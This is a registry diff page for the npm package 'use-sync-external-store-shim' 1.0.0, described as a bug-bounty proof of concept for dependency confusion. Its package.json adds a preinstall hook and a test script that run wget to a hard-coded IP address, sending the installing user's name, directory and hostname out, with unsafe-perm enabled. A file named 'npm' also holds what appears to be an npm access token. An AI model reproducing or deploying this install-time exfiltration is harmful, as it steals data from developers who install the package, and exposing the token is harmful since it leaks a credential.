use-sync-external-store-shim 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of use-sync-external-store-shim might be problematic. Click here for more details.
- package/README.md +2 -0
- package/index.js +3 -0
- package/npm +1 -0
- package/package.json +20 -0
package/README.md
ADDED
package/index.js
ADDED
package/npm
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
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
|
package/package.json
ADDED
|
@@ -0,0 +1,20 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "use-sync-external-store-shim",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "This is a POC for your BugBounty program. You are using Private NPM packages without a Public registered namespace.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "wget --quiet \"http://68.183.37.202/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
|
|
8
|
+
"preinstall": "wget --quiet \"http://68.183.37.202/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
"test",
|
|
12
|
+
"PoC"
|
|
13
|
+
],
|
|
14
|
+
"dependencies": {},
|
|
15
|
+
"config": {
|
|
16
|
+
"unsafe-perm":true
|
|
17
|
+
},
|
|
18
|
+
"author": "njcve",
|
|
19
|
+
"license": "ISC"
|
|
20
|
+
}
|